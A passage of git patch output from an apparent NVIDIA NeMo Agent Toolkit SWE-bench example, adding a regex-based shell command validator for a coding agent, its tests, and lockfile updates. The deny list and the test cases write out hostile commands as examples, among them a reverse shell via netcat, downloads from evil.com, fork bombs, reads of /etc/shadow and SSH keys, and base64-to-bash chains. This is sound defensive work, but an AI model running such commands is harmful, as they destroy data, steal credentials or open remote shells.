Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||). @@ -564,7 +460,8 @@ def run_cmd(): stderr=subprocess.STDOUT, # stderr redirected to stdout text=True, encoding="utf-8", - errors="replace" + errors="replace", + check=False, # Don't raise on non-zero exit; we handle return codes manually ) try: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py new file mode 100644 index 0000000000..1e7a70b5a5 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py @@ -0,0 +1,205 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Shell command validation for security. + +This module provides pattern-based validation to block dangerous shell commands +and common bypass techniques that could be used to evade command filtering. +""" + +import re + +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). 
+DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 
/var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." + (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +# Shell metacharacter bypass patterns that could be used to evade command-based filtering. +# These detect attempts to chain, substitute, or obfuscate commands using shell features. +# Each tuple contains (compiled_regex, error_message). +BYPASS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Command substitution ===== + # Attackers can use $() or backticks to dynamically construct blocked commands. + # Examples: "$(cat /etc/shadow)", "$(echo rm -rf /)", "`whoami`", "`sudo reboot`" + (re.compile(r'\$\([^)]+\)|`[^`]+`'), + "Command substitution ($() or backticks) is not allowed"), + + # ===== Piping to shell interpreters ===== + # Attackers can pipe malicious commands to shell interpreters to bypass direct command checks. 
+ # Examples: "echo 'rm -rf /' | bash", "cat script.sh | sh", "curl url | python" + (re.compile(r'\|\s*(?:bash|sh|zsh|ksh|dash|fish|python[23]?|perl|ruby|node)\b'), + "Piping to shell interpreter is not allowed"), + + # ===== Base64 encoded command execution ===== + # Attackers can encode malicious commands in base64 to evade pattern matching. + # Examples: "echo 'cm0gLXJmIC8=' | base64 -d | bash", "base64 -d script.b64 | sh" + (re.compile(r'base64\s+(-d|--decode).*\|\s*(?:bash|sh|zsh|python|perl)'), + "Base64 decode to shell execution is not allowed"), + + # ===== Eval and exec execution ===== + # Eval/exec can execute arbitrary strings as commands, bypassing static analysis. + # Examples: "eval 'rm -rf /'", "eval $(cat cmd.txt)", "exec rm -rf /" + (re.compile(r'\b(?:eval|exec)\s+'), + "eval/exec command execution is not allowed"), + + # ===== Here-string/here-doc to interpreter ===== + # Attackers can use here-strings or here-docs to feed commands to interpreters. + # Examples: "bash <<< 'rm -rf /'", "python <<< 'import os; os.system(\"rm -rf /\")'" + (re.compile(r'(?:bash|sh|zsh|python[23]?|perl|ruby)\s*<<<'), + "Here-string to interpreter is not allowed"), + + # ===== Process substitution ===== + # Process substitution can be used to execute commands and feed output as files. + # Examples: "cat <(curl http://evil.com)", "diff <(cat /etc/shadow) <(cat /etc/passwd)" + (re.compile(r'<\([^)]+\)'), + "Process substitution is not allowed"), + + # ===== Hex/octal escape execution ===== + # Attackers can use printf with hex/octal escapes to construct commands. + # Examples: "printf '\x72\x6d' | bash", "echo $'\x73\x75\x64\x6f'" + (re.compile(r'printf\s+[\'"][^"\']*\\[xX][0-9a-fA-F].*\|\s*(?:bash|sh)'), + "Hex escape to shell execution is not allowed"), + + # ===== Environment variable command injection ===== + # Attackers can use env vars to smuggle commands. 
+ # Examples: "CMD='rm -rf /' && $CMD", "export X='sudo reboot'; $X" + (re.compile(r'\$\{[^}]+\}.*\|\s*(?:bash|sh)|;\s*\$[A-Z_]+\s*$'), + "Suspicious environment variable execution pattern detected"), + + # ===== Xargs command execution ===== + # Xargs can be used to execute commands from input. + # Examples: "echo 'rm -rf /' | xargs", "find . | xargs rm", "cat cmds.txt | xargs -I{} bash -c '{}'" + (re.compile(r'\|\s*xargs\s+.*(?:-I|-i).*(?:bash|sh|eval)'), + "Xargs with shell execution is not allowed"), + + # ===== Source/dot command execution ===== + # Source or dot can execute scripts in the current shell context. + # Examples: "source /tmp/malicious.sh", ". ./exploit.sh", "source <(curl url)" + (re.compile(r'(?:^|[;&|]\s*)(?:source|\.)[ \t]+'), + "source/dot command execution is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Checks against two pattern lists: + 1. DANGEROUS_PATTERNS: Direct dangerous commands (rm -rf /, sudo, etc.) + 2. BYPASS_PATTERNS: Shell metacharacter tricks that could evade command filtering + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. 
+ """ + # Check dangerous command patterns + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + + # Check bypass/evasion patterns + for pattern, message in BYPASS_PATTERNS: + if pattern.search(command): + return False, message + + return True, "" diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index fe9dd3a1b6..9ecca49fe5 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -17,22 +17,16 @@ import asyncio import subprocess -from pathlib import Path -from unittest.mock import AsyncMock, MagicMock, patch +from unittest.mock import AsyncMock +from unittest.mock import MagicMock +from unittest.mock import patch import pytest -from nat_swe_bench.predictors.predict_iterative.predict_iterative import ( - DANGEROUS_PATTERNS, - ExecutionTimeoutError, - FormatError, - IterativeAgent, - IterativeAgentConfig, - LimitsExceeded, - Submitted, - validate_command, -) - +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ExecutionTimeoutError +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgent +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgentConfig +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command # ============================================================================= # Fixtures @@ -129,6 +123,72 @@ def test_dangerous_commands_blocked(self, command, expected_error): assert expected_error.lower() in error_msg.lower(), \ f"Error message should contain '{expected_error}', got: {error_msg}" + @pytest.mark.parametrize("command,expected_error", [ + # Command substitution + ("$(cat /etc/shadow)", "substitution"), + ("$(echo rm -rf /)", "substitution"), + 
("`whoami`", "substitution"), + # Piping to shell interpreters + ("echo 'rm -rf /' | bash", "interpreter"), + ("cat script.sh | sh", "interpreter"), + ("echo cmd | python", "interpreter"), + ("cat file | perl -e", "interpreter"), + # Eval execution (without command substitution to test eval pattern specifically) + ("eval 'rm -rf /'", "eval"), + ("eval \"echo hello\"", "eval"), + # Exec execution (without dangerous commands to test exec pattern specifically) + ("exec ./script.sh", "eval"), # exec is in same pattern as eval + # Here-string to interpreter + ("bash <<< 'rm -rf /'", "here-string"), + ("python <<< 'import os'", "here-string"), + # Process substitution + ("diff <(cat /etc/shadow) file", "process substitution"), + ("bash <(echo 'echo hello')", "process substitution"), + # Xargs with shell execution + ("cat cmds.txt | xargs -I{} bash -c '{}'", "xargs"), + # Source/dot execution + ("source /tmp/malicious.sh", "source"), + (". ./exploit.sh", "source"), + ]) + def test_bypass_patterns_blocked(self, command, expected_error): + """Test that shell metacharacter bypass attempts are blocked.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Bypass command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # These commands are blocked but by other patterns (DANGEROUS_PATTERNS) + # We test them separately to ensure they ARE blocked + "`sudo reboot`", # blocked by sudo pattern + "echo 'cm0gLXJmIC8=' | base64 -d | bash", # blocked by pipe to interpreter + "eval $(cat cmd.txt)", # blocked by command substitution pattern + "exec rm -rf /", # blocked by rm pattern + "cat <(curl http://evil.com)", # blocked by curl pattern + "printf '\\x72\\x6d' | bash", # blocked by pipe to interpreter + ]) + def test_bypass_commands_blocked_by_other_patterns(self, command): + """Test commands that are blocked by 
earlier patterns in the validation chain.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked, got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # Safe pipe usage (not to shell interpreters) + "grep pattern file.txt | head -10", + "cat file.txt | sort | uniq", + "ls -la | grep '.py'", + # Safe use of common tools + "find . -name '*.py' -type f", + "echo 'hello world'", + "git log --oneline | head -5", + # Safe heredoc (not to interpreter directly) + "cat << EOF > file.txt\nhello\nEOF", + ]) + def test_safe_shell_features_allowed(self, command): + """Test that legitimate shell features are not blocked.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Safe command '{command}' should be allowed but got: {error_msg}" + # ============================================================================= # test_iterative_agent_basic_flow - End-to-end execution @@ -442,7 +502,7 @@ async def test_clone_timeout(self, tmp_path): repo_url = "https://github.com/test/repo" with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: - mock_wait.side_effect = asyncio.TimeoutError() + mock_wait.side_effect = TimeoutError() with pytest.raises(asyncio.TimeoutError): await clone_repository(repo_url, target_path, timeout=1) @@ -498,6 +558,7 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager # Create a mock that raises an exception @@ -554,7 +615,8 @@ def test_build_task_description_without_hints(self): @pytest.mark.asyncio async def test_repo_manager_setup_existing_repo(self, tmp_path): """Test setup_repository when repo is already active.""" - from 
nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager, RepoContext + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoContext + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager manager = RepoManager(str(tmp_path)) @@ -609,7 +671,7 @@ async def test_checkout_timeout(self): mock_repo = MagicMock() with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: - mock_wait.side_effect = asyncio.TimeoutError() + mock_wait.side_effect = TimeoutError() with pytest.raises(asyncio.TimeoutError): await checkout_commit(mock_repo, "abc123", timeout=1) From e8e7e82722419962978eee699b0628cafd3a04f1 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 21:31:35 -0800 Subject: [PATCH 21/22] chore(swe-bench): code review fixes - Rename "NAT framework" to "NeMo Agent Toolkit" for consistency - Remove redundant @pytest.mark.asyncio decorators (asyncio_mode=auto) - Regenerate uv.lock Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 2 +- .../tests/test_iterative_predictor.py | 20 ------------------- .../swe_bench/uv.lock | 5 ++++- 3 files changed, 5 insertions(+), 22 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 8a92eaf090..bc8574f507 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -22,7 +22,7 @@ 3. Observes results and adjusts strategy 4. Generates patch using git diff -The iterative loop and prompts are inspired by mini-swe-agent, adapted for the NAT framework. 
+The iterative loop and prompts are inspired by mini-swe-agent, adapted for NeMo Agent Toolkit. """ import asyncio diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 9ecca49fe5..14f00cba5c 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -197,7 +197,6 @@ def test_safe_shell_features_allowed(self, command): class TestIterativeAgentBasicFlow: """Tests for the basic agent execution flow.""" - @pytest.mark.asyncio async def test_basic_flow_to_submission(self, agent, mock_llm): """Test that agent completes a basic flow and submits correctly.""" # Setup: LLM returns a sequence of responses ending with submission @@ -227,7 +226,6 @@ async def test_basic_flow_to_submission(self, agent, mock_llm): assert "diff" in result or "COMPLETE_TASK" in result assert agent.n_steps == 2 - @pytest.mark.asyncio async def test_token_accumulation(self, agent, mock_llm): """Test that tokens are correctly accumulated across steps.""" responses = [ @@ -246,7 +244,6 @@ async def test_token_accumulation(self, agent, mock_llm): assert agent.total_input_tokens == 300 # 100 + 200 assert agent.total_output_tokens == 150 # 50 + 100 - @pytest.mark.asyncio async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): """Test that agent stops when step limit is reached.""" config = IterativeAgentConfig(step_limit=2, timeout=5) @@ -273,7 +270,6 @@ async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): class TestFormatErrorRecovery: """Tests for handling malformed LLM responses.""" - @pytest.mark.asyncio async def test_recovery_from_no_bash_block(self, agent, mock_llm): """Test that agent recovers when LLM doesn't include a bash block.""" responses = [ @@ -292,7 +288,6 @@ async def test_recovery_from_no_bash_block(self, agent, 
mock_llm): assert exit_status == "Submitted" assert agent.n_steps == 2 # First step failed format, second succeeded - @pytest.mark.asyncio async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): """Test that agent recovers when LLM includes multiple bash blocks.""" responses = [ @@ -310,7 +305,6 @@ async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): assert exit_status == "Submitted" - @pytest.mark.asyncio async def test_recovery_from_dangerous_command(self, agent, mock_llm): """Test that agent recovers when LLM suggests a dangerous command.""" responses = [ @@ -336,7 +330,6 @@ async def test_recovery_from_dangerous_command(self, agent, mock_llm): class TestTimeoutHandling: """Tests for command execution timeout handling.""" - @pytest.mark.asyncio async def test_command_timeout_recovery(self, agent, mock_llm): """Test that agent recovers from a command timeout.""" responses = [ @@ -356,7 +349,6 @@ async def test_command_timeout_recovery(self, agent, mock_llm): assert exit_status == "Submitted" - @pytest.mark.asyncio async def test_timeout_message_includes_command(self, agent, mock_llm): """Test that timeout error message includes the timed-out command.""" mock_llm.ainvoke = AsyncMock( @@ -445,7 +437,6 @@ def test_ssh_url_parsing(self, tmp_path): class TestRepoSetupAndCheckout: """Tests for git repository setup and checkout operations.""" - @pytest.mark.asyncio async def test_clone_repository_success(self, tmp_path): """Test successful repository cloning.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -464,7 +455,6 @@ async def test_clone_repository_success(self, tmp_path): assert result == mock_repo - @pytest.mark.asyncio async def test_clone_repository_invalid_url(self, tmp_path): """Test that invalid URLs raise ValueError.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -477,7 +467,6 @@ async def test_clone_repository_invalid_url(self, 
tmp_path): assert "Invalid repository URL" in str(exc_info.value) - @pytest.mark.asyncio async def test_checkout_commit_success(self): """Test successful commit checkout.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit @@ -493,7 +482,6 @@ async def test_checkout_commit_success(self): # Verify checkout was called mock_thread.assert_called_once() - @pytest.mark.asyncio async def test_clone_timeout(self, tmp_path): """Test that clone operation times out correctly.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -515,7 +503,6 @@ async def test_clone_timeout(self, tmp_path): class TestCleanup: """Tests for resource cleanup operations.""" - @pytest.mark.asyncio async def test_repo_manager_cleanup(self, tmp_path): """Test that RepoManager cleans up all active repos.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager @@ -538,7 +525,6 @@ async def test_repo_manager_cleanup(self, tmp_path): assert not repo2.exists() assert len(manager.active_repos) == 0 - @pytest.mark.asyncio async def test_cleanup_handles_missing_directory(self, tmp_path): """Test that cleanup handles already-deleted directories gracefully.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager @@ -554,7 +540,6 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): assert len(manager.active_repos) == 0 - @pytest.mark.asyncio async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock @@ -612,7 +597,6 @@ def test_build_task_description_without_hints(self): assert "Fix the bug" in result assert "Additional Context" not in result - @pytest.mark.asyncio async def test_repo_manager_setup_existing_repo(self, tmp_path): """Test setup_repository when repo is already active.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import 
RepoContext @@ -643,7 +627,6 @@ async def test_repo_manager_setup_existing_repo(self, tmp_path): assert result == mock_context mock_checkout.assert_called_once() - @pytest.mark.asyncio async def test_clone_cleans_existing_path(self, tmp_path): """Test that clone removes existing directory before cloning.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository @@ -663,7 +646,6 @@ async def test_clone_cleans_existing_path(self, tmp_path): # The old directory should have been removed (in reality, then clone creates new) assert result == mock_repo - @pytest.mark.asyncio async def test_checkout_timeout(self): """Test checkout operation timeout.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit @@ -695,7 +677,6 @@ def test_output_truncation(self, agent): assert "elided_chars" in truncated assert "1000 characters elided" in truncated - @pytest.mark.asyncio async def test_add_message_invalid_role(self, agent): """Test that invalid role raises ValueError.""" with pytest.raises(ValueError) as exc_info: @@ -707,7 +688,6 @@ async def test_add_message_invalid_role(self, agent): class TestIntegrationMockedLLM: """Integration tests with mocked LLM.""" - @pytest.mark.asyncio async def test_full_workflow_simulation(self, tmp_path): """Simulate a complete workflow with realistic LLM responses.""" # Create a mock LLM diff --git a/examples/evaluation_and_profiling/swe_bench/uv.lock b/examples/evaluation_and_profiling/swe_bench/uv.lock index af3cf0b0ad..56ab2f0a51 100644 --- a/examples/evaluation_and_profiling/swe_bench/uv.lock +++ b/examples/evaluation_and_profiling/swe_bench/uv.lock @@ -932,6 +932,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/e8/2e1462c8fdbe0f210feb5ac7ad2d9029af8be3bf45bd9fa39765f821642f/greenlet-3.3.1-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:5fd23b9bc6d37b563211c6abbb1b3cab27db385a4449af5c32e932f93017080c", size = 274974, upload-time = 
"2026-01-23T15:31:02.891Z" }, { url = "https://files.pythonhosted.org/packages/7e/a8/530a401419a6b302af59f67aaf0b9ba1015855ea7e56c036b5928793c5bd/greenlet-3.3.1-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:09f51496a0bfbaa9d74d36a52d2580d1ef5ed4fdfcff0a73730abfbbbe1403dd", size = 577175, upload-time = "2026-01-23T16:00:56.213Z" }, { url = "https://files.pythonhosted.org/packages/8e/89/7e812bb9c05e1aaef9b597ac1d0962b9021d2c6269354966451e885c4e6b/greenlet-3.3.1-cp311-cp311-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:cb0feb07fe6e6a74615ee62a880007d976cf739b6669cce95daa7373d4fc69c5", size = 590401, upload-time = "2026-01-23T16:05:26.365Z" }, + { url = "https://files.pythonhosted.org/packages/70/ae/e2d5f0e59b94a2269b68a629173263fa40b63da32f5c231307c349315871/greenlet-3.3.1-cp311-cp311-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:67ea3fc73c8cd92f42467a72b75e8f05ed51a0e9b1d15398c913416f2dafd49f", size = 601161, upload-time = "2026-01-23T16:15:53.456Z" }, { url = "https://files.pythonhosted.org/packages/5c/ae/8d472e1f5ac5efe55c563f3eabb38c98a44b832602e12910750a7c025802/greenlet-3.3.1-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:39eda9ba259cc9801da05351eaa8576e9aa83eb9411e8f0c299e05d712a210f2", size = 590272, upload-time = "2026-01-23T15:32:49.411Z" }, { url = "https://files.pythonhosted.org/packages/a8/51/0fde34bebfcadc833550717eade64e35ec8738e6b097d5d248274a01258b/greenlet-3.3.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e2e7e882f83149f0a71ac822ebf156d902e7a5d22c9045e3e0d1daf59cee2cc9", size = 1550729, upload-time = "2026-01-23T16:04:20.867Z" }, { url = "https://files.pythonhosted.org/packages/16/c9/2fb47bee83b25b119d5a35d580807bb8b92480a54b68fef009a02945629f/greenlet-3.3.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:80aa4d79eb5564f2e0a6144fcc744b5a37c56c4a92d60920720e99210d88db0f", size = 1615552, upload-time = "2026-01-23T15:33:45.743Z" }, @@ 
-940,6 +941,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/f9/c8/9d76a66421d1ae24340dfae7e79c313957f6e3195c144d2c73333b5bfe34/greenlet-3.3.1-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:7e806ca53acf6d15a888405880766ec84721aa4181261cd11a457dfe9a7a4975", size = 276443, upload-time = "2026-01-23T15:30:10.066Z" }, { url = "https://files.pythonhosted.org/packages/81/99/401ff34bb3c032d1f10477d199724f5e5f6fbfb59816ad1455c79c1eb8e7/greenlet-3.3.1-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d842c94b9155f1c9b3058036c24ffb8ff78b428414a19792b2380be9cecf4f36", size = 597359, upload-time = "2026-01-23T16:00:57.394Z" }, { url = "https://files.pythonhosted.org/packages/2b/bc/4dcc0871ed557792d304f50be0f7487a14e017952ec689effe2180a6ff35/greenlet-3.3.1-cp312-cp312-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:20fedaadd422fa02695f82093f9a98bad3dab5fcda793c658b945fcde2ab27ba", size = 607805, upload-time = "2026-01-23T16:05:28.068Z" }, + { url = "https://files.pythonhosted.org/packages/3b/cd/7a7ca57588dac3389e97f7c9521cb6641fd8b6602faf1eaa4188384757df/greenlet-3.3.1-cp312-cp312-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:c620051669fd04ac6b60ebc70478210119c56e2d5d5df848baec4312e260e4ca", size = 622363, upload-time = "2026-01-23T16:15:54.754Z" }, { url = "https://files.pythonhosted.org/packages/cf/05/821587cf19e2ce1f2b24945d890b164401e5085f9d09cbd969b0c193cd20/greenlet-3.3.1-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:14194f5f4305800ff329cbf02c5fcc88f01886cadd29941b807668a45f0d2336", size = 609947, upload-time = "2026-01-23T15:32:51.004Z" }, { url = "https://files.pythonhosted.org/packages/a4/52/ee8c46ed9f8babaa93a19e577f26e3d28a519feac6350ed6f25f1afee7e9/greenlet-3.3.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:7b2fe4150a0cf59f847a67db8c155ac36aed89080a6a639e9f16df5d6c6096f1", size = 1567487, upload-time = "2026-01-23T16:04:22.125Z" }, { url 
= "https://files.pythonhosted.org/packages/8f/7c/456a74f07029597626f3a6db71b273a3632aecb9afafeeca452cfa633197/greenlet-3.3.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:49f4ad195d45f4a66a0eb9c1ba4832bb380570d361912fa3554746830d332149", size = 1636087, upload-time = "2026-01-23T15:33:47.486Z" }, @@ -948,6 +950,7 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/ec/ab/d26750f2b7242c2b90ea2ad71de70cfcd73a948a49513188a0fc0d6fc15a/greenlet-3.3.1-cp313-cp313-macosx_11_0_universal2.whl", hash = "sha256:7ab327905cabb0622adca5971e488064e35115430cec2c35a50fd36e72a315b3", size = 275205, upload-time = "2026-01-23T15:30:24.556Z" }, { url = "https://files.pythonhosted.org/packages/10/d3/be7d19e8fad7c5a78eeefb2d896a08cd4643e1e90c605c4be3b46264998f/greenlet-3.3.1-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:65be2f026ca6a176f88fb935ee23c18333ccea97048076aef4db1ef5bc0713ac", size = 599284, upload-time = "2026-01-23T16:00:58.584Z" }, { url = "https://files.pythonhosted.org/packages/ae/21/fe703aaa056fdb0f17e5afd4b5c80195bbdab701208918938bd15b00d39b/greenlet-3.3.1-cp313-cp313-manylinux_2_24_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:7a3ae05b3d225b4155bda56b072ceb09d05e974bc74be6c3fc15463cf69f33fd", size = 610274, upload-time = "2026-01-23T16:05:29.312Z" }, + { url = "https://files.pythonhosted.org/packages/06/00/95df0b6a935103c0452dad2203f5be8377e551b8466a29650c4c5a5af6cc/greenlet-3.3.1-cp313-cp313-manylinux_2_24_s390x.manylinux_2_28_s390x.whl", hash = "sha256:12184c61e5d64268a160226fb4818af4df02cfead8379d7f8b99a56c3a54ff3e", size = 624375, upload-time = "2026-01-23T16:15:55.915Z" }, { url = "https://files.pythonhosted.org/packages/cb/86/5c6ab23bb3c28c21ed6bebad006515cfe08b04613eb105ca0041fecca852/greenlet-3.3.1-cp313-cp313-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6423481193bbbe871313de5fd06a082f2649e7ce6e08015d2a76c1e9186ca5b3", size = 612904, upload-time = "2026-01-23T15:32:52.317Z" }, { url = 
